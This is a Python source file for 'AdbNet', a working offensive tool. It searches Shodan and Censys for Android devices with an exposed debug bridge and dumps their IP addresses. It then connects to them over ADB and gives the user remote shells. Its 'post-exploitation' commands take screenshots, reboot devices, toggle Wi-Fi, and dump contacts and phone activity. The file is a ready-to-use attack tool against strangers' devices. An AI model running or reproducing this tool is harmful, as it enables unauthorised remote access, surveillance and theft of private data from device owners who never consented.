adbnet.py

1. try:
2.     import os
3.     import re
4.     import socket
5.     import pathlib
6.     import requests
7.     import subprocess
8.     from time import sleep
9.     from colorama import Fore
10.     from datetime import datetime
11. except:
12.     print("[-] Error! Make sure you install the required modules!")
13.  
14.  
15. shodan_key = "" # Add your Shodan API Key here
16. api_id = "" # Add your Censys API ID here
17. api_secret = "" # Add your Censys API Secret Key here
18.  
19.  
20. # AdbNet
21. # Date: 07/06/21
22. # Author: https://github.com/0x1CA3
23.  
24.  
25. cur = datetime.now()
26. clear_screen = lambda: os.system("cls" if os.name == "nt" else "clear")
27. current_time = cur.strftime("%m/%d/%Y, %H:%M:%S")
28. leave = lambda: exit()
29. computer_name = socket.gethostname()
30.  
31. class other():
32.     def help_menu():
33.         helpmain = f"""
34.        {Fore.GREEN}Commands                            Description
35.        {Fore.GREEN}--------                            -----------
36.        {Fore.RED}help                                Displays help commands.
37.        {Fore.RED}info                                Lets you retrieve information on a specified device.
38.        {Fore.RED}post                                Loads post-exploitation modules for connected android devices.
39.        {Fore.RED}shell                               Lets you execute a system command.
40.        {Fore.RED}banner                              Displays the banner.
41.        {Fore.RED}other                               Displays other/extra commands.
42.        {Fore.RED}clear                               Clears the screen.
43.        {Fore.RED}exit                                Exits.
44.        
45.        {Fore.GREEN}ADB Options [Remote-Access]         Description
46.        {Fore.GREEN}-----------                         -----------
47.        {Fore.RED}adb                                 Lets you execute your own custom commands for ADB.
48.        {Fore.RED}install                             Installs ADB if you don't already have it installed.
49.        {Fore.RED}connect                             Lets you connect to a specific device.
50.        {Fore.RED}devices                             Lists the devices YOU are currently connected to.
51.        {Fore.RED}command                             Lets you execute a command without opening a shell.
52.        {Fore.RED}terminal                            Opens up a shell. [Use the 'exit' command to return back to the Framework]
53.        {Fore.RED}killall                             Kills all sessions.
54.      
55.        {Fore.GREEN}Scanner Options                     Description
56.        {Fore.GREEN}---------------                     -----------
57.        {Fore.RED}scan shodan                         Uses shodan to search for vulnerable devices. [This is the default scanner]
58.        {Fore.RED}scan censy                          Uses censys to search for vulnerable devices.
59.        """
60.         print(helpmain)
61.  
62.     def banner():
63.         clear_screen()
64.         a = requests.get(f'''https://api.shodan.io/shodan/host/count?key={shodan_key}&query=android+debug+bridge''').text
65.         clea = a.replace('''{"matches": [], "total":''', '')
66.         cleanr = clea.replace('''}''', '')
67.         banr = f"""
68.            {Fore.RED} ▄▄▄      ▓█████▄  ▄▄▄▄       ███▄    █ ▓█████▄▄▄█████▓    {Fore.GREEN}[+] Logged in as: {computer_name}
69.            {Fore.RED}▒████▄    ▒██▀ ██▌▓█████▄     ██ ▀█   █ ▓█   ▀▓  ██▒ ▓▒    {Fore.GREEN}[+] Devices available:{cleanr}
70.            {Fore.RED}▒██  ▀█▄  ░██   █▌▒██▒ ▄██   ▓██  ▀█ ██▒▒███  ▒ ▓██░ ▒░    {Fore.GREEN}[+] Time: {current_time}
71.            {Fore.RED}░██▄▄▄▄██ ░▓█▄   ▌▒██░█▀     ▓██▒  ▐▌██▒▒▓█  ▄░ ▓██▓ ░     {Fore.GREEN}[+] Made by: https://github.com/0x1CA3
72.            {Fore.RED} ▓█   ▓██▒░▒████▓ ░▓█  ▀█▓   ▒██░   ▓██░░▒████▒ ▒██▒ ░     {Fore.GREEN}[+] The most common ports are 5555 and 4444!
73.            {Fore.RED} ▒▒   ▓▒█░ ▒▒▓  ▒ ░▒▓███▀▒   ░ ▒░   ▒ ▒ ░░ ▒░ ░ ▒ ░░       {Fore.GREEN}[+] Use 'help' or '?' for commands!
74.            {Fore.RED}  ▒   ▒▒ ░ ░ ▒  ▒ ▒░▒   ░    ░ ░░   ░ ▒░ ░ ░  ░   ░    
75.            {Fore.RED}  ░   ▒    ░ ░  ░  ░    ░       ░   ░ ░    ░    ░      
76.            {Fore.RED}      ░  ░   ░     ░                  ░    ░  ░        
77.            {Fore.RED}           ░            ░                              
78.        """
79.         print(banr)
80.    
81.     def help_other():
82.         otherhelp = f"""
83.        {Fore.GREEN}Dump Options                        Description
84.        {Fore.GREEN}------------                        -----------
85.        {Fore.RED}dump shodan                         Attempts to dump IP addresses of the vulnerable devices. [Shodan]
86.        {Fore.RED}dump censy                          Attempts to dump IP addresses of the vulnerable devices. [Censy]
87.        """
88.         print(otherhelp)
89.  
90.     def post_help():
91.         helppost = f"""
92.        [Reminder: Make sure you are already connected to a device! You can check if you are by using the 'devices' command.]
93.        
94.        {Fore.GREEN}Post-Exploitation-Modules                          Description
95.        {Fore.GREEN}-------------------------                          -----------
96.        {Fore.RED}battery                                            Retrieves the devices battery information.
97.        {Fore.RED}net_enable                                         Enables Wi-Fi remotely on the device.
98.        {Fore.RED}net_disable                                        Disables Wi-Fi remotely on the device.
99.        {Fore.RED}screenshot                                         Takes a screenshot remotely on the device.
100.        {Fore.RED}reboot                                             Remotely reboots the device.
101.        {Fore.RED}dump_contacts                                      Remotely dumps the stored contacts on the device.
102.        {Fore.RED}dump_activity                                      Retrieves the phones activity.
103.        """
104.         print(helppost)
105.    
106.     def terminal():
107.         while True:
108.             term = input(f"{Fore.GREEN}({pathlib.Path().resolve()})-[user@terminal]~# ")
109.             if term == "back" or term == "exit": cli()
110.             else: os.system(f"{term}")
111.  
112.     def adb_terminal():
113.         while True:
114.             adb_term = input(f"{Fore.GREEN}({pathlib.Path().resolve()})-[user@adb]~# ")
115.             if adb_term == "back" or adb_term == "exit": cli()
116.             else: os.system(f"adb {adb_term}")
117.  
118.     def fetch_device_ip():
119.         os.system("python extra/fetch.py > extra/ip.txt")
120.         os.system("python3 extra/fetch.py > extra/ip.txt")
121.         fetchipfile = open("extra/ip.txt", "r")
122.         datafetch = fetchipfile.readlines()
123.         print(f"{Fore.GREEN}[+] Attempting to dump data...")
124.         sleep(0.10)
125.         for line in datafetch:
126.             if "ip_str" or "host" in line:
127.                 print(f'''{Fore.GREEN}[+] Fetched information!
128.                --------------------------------
129.                {line}''')
130.             else:
131.                 print(f"{Fore.RED}[-] Error! Could not fetch IP addresses!")
132.  
133.     def censys_scan_device():
134.         if os.name == "nt":
135.             os.system(f'''curl -G 'https://search.censys.io/api/v2/hosts/search' --data-urlencode "q='Android Debug Bridge'" -u {api_id}:{api_secret}''')
136.         else:
137.             os.system(f'''curl -G 'https://search.censys.io/api/v2/hosts/search' --data-urlencode "q='Android Debug Bridge'" -u {api_id}:{api_secret} | jq '.' > extra/data.json''')
138.             censydata = open("extra/data.json", "r")
139.             datext = censydata.readlines()
140.             for line in datext:
141.                 if "total" in line:
142.                     cenip = line
143.                     cenipclean = cenip.replace('''"''', '')
144.                     cencleanerip = cenipclean.replace(":", '')
145.                     cenclenfinal = cencleanerip.replace(",", '')
146.                     censuperipclean = re.sub('[a-z]', '', cenclenfinal)
147.                     print(f"\n{Fore.GREEN}[+] Devices available: " + censuperipclean)
148.    
149.     def censys_dump_ip():
150.         if os.name == "nt":
151.             os.system(f'''curl -G 'https://search.censys.io/api/v2/hosts/search' --data-urlencode "q='Android Debug Bridge'" -u {api_id}:{api_secret}''')
152.         else:
153.             os.system(f'''curl -G 'https://search.censys.io/api/v2/hosts/search' --data-urlencode "q='Android Debug Bridge'" -u {api_id}:{api_secret} | jq '.' > extra/data.json''')
154.             censydata = open("extra/data.json", "r")
155.             datext = censydata.readlines()
156.             for line in datext:
157.                 if "ip" in line:
158.                     cenip1 = line
159.                     cenipclean1 = cenip1.replace('''"''', '')
160.                     cencleanerip1 = cenipclean1.replace(":", '')
161.                     cenclenfinal1 = cencleanerip1.replace(",", '')
162.                     censuperipclean1 = re.sub('[a-z]', '', cenclenfinal1)
163.                     print(f"{Fore.GREEN}[+] IP Address dumped! -" + censuperipclean1)
164.  
165. class handler():
166.     def __init__(self, command):
167.         self.shell = command
168.  
169.     def device_check_shodan():
170.         print("Checking devices...")
171.         sleep(0.5)
172.         a = requests.get(f'''https://api.shodan.io/shodan/host/count?key={shodan_key}&query=android+debug+bridge''').text
173.         clean = a.replace('''{"matches": [], "total":''', '')
174.         cleaner = clean.replace('''}''', '')
175.         print(f"{Fore.GREEN}\n[+]{cleaner} Devices available!\n")
176.    
177.     cmds = \
178.         {
179.             "help": other.help_menu,
180.             "?": other.help_menu,
181.             "dump shodan": other.fetch_device_ip,
182.             "dump censy": other.censys_dump_ip,
183.             "clear": clear_screen,
184.             "post": other.post_help,
185.             "shell": other.terminal,
186.             "scan shodan": device_check_shodan,
187.             "scan censy": other.censys_scan_device,
188.             "banner": other.banner,
189.             "other": other.help_other,
190.             "exit": leave,
191.             "adb": other.adb_terminal
192.         }
193.    
194.     postexp = \
195.         {
196.             "battery": "adb shell dumpsys battery",
197.             "net_enable": "adb shell svc wifi enable",
198.             "net_disable": "adb shell svc wifi disable",
199.             "screenshot": "adb shell screencap /sdcard/sspwned.png",
200.             "reboot": "adb reboot",
201.             "dump_contacts": "adb shell content query --uri content://contacts/phones/  --projection display_name:number",
202.             "dump_activity": "adb shell dumpsys activity"
203.         }
204.    
205.     adb_cmds = \
206.         {
207.             "install": "sudo apt install adb",
208.             "devices": "adb devices",
209.             "terminal": "adb shell",
210.             "killall": "adb kill-server"
211.         }
212.  
213.     def device_information(android_device):
214.         print("Fetching information on device...")
215.         sleep(0.5)
216.         try:
217.             b = requests.get(f'''https://api.shodan.io/shodan/host/{android_device}?key={shodan_key}''')
218.             print(f"{Fore.GREEN}[+] Information Fetched!")
219.             print(b.text)
220.         except:
221.             print(f"{Fore.RED}[-] Failed to retrieve information about the specified device!")
222.  
223.     def extra_run(self):
224.         if self.shell == "info":
225.             android_device = input(f"{Fore.GREEN}({pathlib.Path().resolve()})-[Enter an IP]~# ")
226.             handler.device_information(android_device)
227.         elif self.shell == "connect":
228.             adb_connect = input(f"{Fore.GREEN}({pathlib.Path().resolve()})-[Enter an IP]~# ")
229.             adb_port = input(f"{Fore.GREEN}({pathlib.Path().resolve()})-[Enter a Port]~# ")
230.             print("[+] Starting...")
231.             sleep(0.4)
232.             os.system(f"adb connect {adb_connect}:{adb_port}")
233.         elif self.shell == "command":
234.             adb_command = input(f"{Fore.GREEN}({pathlib.Path().resolve()})-[Enter a command]~# ")
235.             os.system(f"adb shell {adb_command}")
236.         else:
237.             print(f"{Fore.RED}Error! Command [{self.shell}] was not found!")
238.    
239.     def cmd(self, cmds=cmds, adb_cmds=adb_cmds, postexp=postexp):
240.         if self.shell in cmds:
241.             try:
242.                 cmds[self.shell]()
243.             except:
244.                 print(f"{Fore.RED}[-] Failed to properly execute command!")
245.         elif self.shell in adb_cmds:
246.             try:
247.                 subprocess.call(adb_cmds[self.shell], shell=True)
248.             except:
249.                 print(f"{Fore.RED}[-] Failed to properly execute command!")
250.         elif self.shell in postexp:
251.             try:
252.                 subprocess.call(postexp[self.shell], shell=True)
253.             except:
254.                 print(f"{Fore.RED}[-] Failed to properly execute command!")
255.         else:
256.             handler.extra_run(self)
257.  
258. def cli():
259.     while True:
260.         shell = handler(input(f"{Fore.GREEN}({pathlib.Path().resolve()})-[user@adbnet]~# "))
261.         shell.cmd()
262.  
263. if __name__ == "__main__":
264.     try:
265.         other.banner()
266.         cli()
267.     except KeyboardInterrupt as interrupt:
268.         exit(interrupt)